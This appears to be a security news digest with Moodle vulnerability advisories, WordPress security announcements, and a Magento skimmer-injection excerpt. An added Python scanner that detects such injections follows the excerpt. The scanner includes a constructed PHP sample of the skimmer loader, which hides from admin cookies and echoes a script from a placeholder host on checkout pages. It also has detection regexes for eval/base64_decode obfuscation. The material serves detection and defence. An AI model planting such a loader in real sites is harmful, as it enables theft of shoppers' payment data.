by Michael Hawkins. Messaging did not impose a character limit when sending messages, which could result in client-side (browser) denial of service for users receiving very large messages.
Severity/Risk: Minor
Versions affected: 3.10, 3.9 to 3.9.3, 3.8 to 3.8.6, 3.5 to 3.5.15 and earlier unsupported versions
Versions fixed: 3.10.1, 3.9.4, 3.8.7 and 3.5.16
Reported by: Rik Gouw
CVE identifier: CVE-2021-20185
More info:
https://moodle.org/mod/forum/discuss.php?d=417168&parent=1680841
by Michael Hawkins. If the TeX notation filter was enabled, additional sanitizing of TeX content was required to prevent the risk of stored XSS.
Severity/Risk: Serious
Versions affected: 3.10, 3.9 to 3.9.3, 3.8 to 3.8.6, 3.5 to 3.5.15 and earlier unsupported versions
Versions fixed: 3.10.1, 3.9.4, 3.8.7 and 3.5.16
Reported by: Ata Hakcil
Workaround: Disable the TeX notation filter until the patch has been applied. (Note that this filter is disabled by default.)
CVE identifier: CVE-2021-20186
More info:
https://moodle.org/mod/forum/discuss.php?d=417170&parent=1680845
by Michael Hawkins. It was possible for site administrators to execute arbitrary PHP scripts via a PHP include used during Shibboleth authentication.
Severity/Risk: Serious
Versions affected: 3.10, 3.9 to 3.9.3, 3.8 to 3.8.6, 3.5 to 3.5.15 and earlier unsupported versions
Versions fixed: 3.10.1, 3.9.4, 3.8.7 and 3.5.16
Reported by: Frédéric Massart
Workaround: Hardcode preventexecpath to true in config.php ($CFG->preventexecpath = true;), which prevents site administrators from setting some executable paths via the UI. See
More info:
https://moodle.org/mod/forum/discuss.php?d=417171&parent=1680847
Wordfence, the leading provider of WordPress security software and services, is announcing today that we are, effective immediately, offering free site cleaning and site security audit services to K-12 public schools in the United States who use WordPress as their content management system. Whether a site is infected with malware, or you are looking for […]
More info:
https://www.wordfence.com/blog/2021/01/announcing-free-site-cleaning-site-security-audits-for-k-12-public-schools/
A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php … if ($_SERVER["REQUEST_METHOD"] === "GET"){ if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){ if(!isset($_COOKIE["adminhtml"])){ echo
More info:
http://feedproxy.google.com/~r/sucuri/blog/~3/pp87qW5hBU0/magento-php-injection-loads-javascript-skimmer.html
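The injection above is easy to miss in a code review because every piece of it is legitimate PHP: a GET check, a URI substring test, a cookie test, an echo. What makes it a skimmer loader is the combination (hide from anyone holding an admin session, fire only on the checkout page, write markup into the response from a payment model class that should never emit HTML). The following scanner is an added example written for this page, not Sucuri's tooling; it looks for that combination across a Magento tree and pairs it with a SHA-256 baseline diff, which is the more reliable check when a known-good copy of the release exists. The two PHP samples inside it are constructed to mirror the described pattern and the skimmer URL is a placeholder, not taken from a real compromise.

```python
"""Heuristic scan for injected skimmer loaders in a Magento PHP tree.

Added example; not code from the original article or from Sucuri.
The PHP samples and the skimmer host below are constructed.
"""
from __future__ import annotations

import hashlib
import re
import tempfile
from pathlib import Path

# Each indicator is benign on its own. The flagging rule below requires
# a visitor-vs-admin gate (or obfuscation) together with an echo of markup.
INDICATORS = [
    ("request_uri_check", re.compile(r"\$_SERVER\[\s*['\"]REQUEST_URI['\"]\s*\]")),
    ("checkout_path",     re.compile(r"onestepcheckout|/checkout/", re.I)),
    ("admin_cookie_gate", re.compile(r"!\s*isset\(\s*\$_COOKIE\[\s*['\"]adminhtml['\"]")),
    ("echo_markup",       re.compile(r"\becho\s*['\"]\s*<(script|img|iframe)", re.I)),
    ("obfuscation",       re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\(")),
]

# Model code under these paths should never write HTML to the response at all.
SUSPICIOUS_DIRS = ("app/code/core/Mage/Payment/", "app/code/core/Mage/Checkout/")

# Constructed sample: a stripped-down clean payment model class.
CLEAN_CC = """<?php
class Mage_Payment_Model_Method_Cc extends Mage_Payment_Model_Method_Abstract
{
    protected $_code = 'ccsave';
    public function validate() { parent::validate(); return $this; }
}
"""

# Constructed sample: the same file with a loader appended in the shape the
# article describes (GET, checkout URI, no adminhtml cookie, then echo).
INJECTED_CC = CLEAN_CC + """
if ($_SERVER["REQUEST_METHOD"] === "GET") {
    if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false) {
        if (!isset($_COOKIE["adminhtml"])) {
            echo "<script src='https://skimmer.invalid/loader.js'></script>";
        }
    }
}
"""


def scan_php_source(source: str) -> list[str]:
    """Return the names of every indicator present in one PHP file's text."""
    return [name for name, pat in INDICATORS if pat.search(source)]


def is_skimmer_like(hits: list[str]) -> bool:
    """Flag files that write markup while hiding from admins or decoding a blob."""
    found = set(hits)
    return "echo_markup" in found and bool(found & {"admin_cookie_gate", "obfuscation"})


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every .php file under root; return {relative path: hits} for flagged files."""
    flagged: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        hits = scan_php_source(path.read_text(errors="replace"))
        # Any echo of markup inside a payment/checkout model is worth a look,
        # even without the admin-cookie gate.
        if is_skimmer_like(hits) or (rel.startswith(SUSPICIOUS_DIRS) and "echo_markup" in hits):
            flagged[rel] = hits
    return flagged


def hash_baseline(root: Path) -> dict[str, str]:
    """Map each .php path under root to its SHA-256 for diffing against a clean release."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*.php"))}


def diff_baseline(known_good: dict[str, str], current: dict[str, str]) -> list[str]:
    """Paths whose digest differs from, or is absent in, the known-good baseline."""
    return sorted(p for p, d in current.items() if known_good.get(p) != d)


def demo_tree() -> dict[str, list[str]]:
    """Build a throwaway tree holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        target = root / "app/code/core/Mage/Payment/Model/Method"
        target.mkdir(parents=True)
        (target / "Cc.php").write_text(INJECTED_CC)
        (root / "index.php").write_text(CLEAN_CC)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in demo_tree().items():
        print(f"FLAG {rel}: {', '.join(hits)}")
```

Run it against a site root; anything it flags should then be compared byte-for-byte with the vendor's copy of that file. The heuristic list is deliberately small and will miss loaders that build the script tag from string fragments, which is why the hash diff against a known-good release tree is the check to trust when one is available.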
Today we are in the third week of 2021, and we are happy to announce the third plugin update of the year: Password Policy Manager 2.3.4. This update features better interoperability with third party plugins, a few minor improvements, and a number of bug fixes. Let’s dive right into the below highlight to see what […]
More info:
https://www.wpwhitesecurity.com/ppmwp-2-3-4/
In mass infection scenarios, our Malware Research team often looks for attack vectors to find patterns and other similarities among compromised websites. The identification of these patterns allows us to deploy better and faster solutions to our customers, minimizing impacts from massive attacks. Recently during a routine investigation, we found a number of vulnerabilities in […]
More info:
http://feedproxy.google.com/~r/sucuri/blog/~3/--9_7xc3sO4/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
WordPress security can be intimidating, but it doesn’t have to be. In this comprehensive guide to WordPress security, we’ve simplified the basics of securing your WordPress website so that any non-technical person can understand and protect their website from hacker attacks. This guide to WordPress security is broken down into 10 easily digestible sections. Each […]
More info:
https://ithemes.com/wordpress-security-the-ultimate-guide/
2020 has been a challenging year for many. However, we have been very lucky and even though it was challenging, we’ve made the best out of it, and we turned it into a big one! So we wanted to take the time and look back at everything that happened at WP White Security. With remote […]
More info:
https://www.wpwhitesecurity.com/2020-year-review/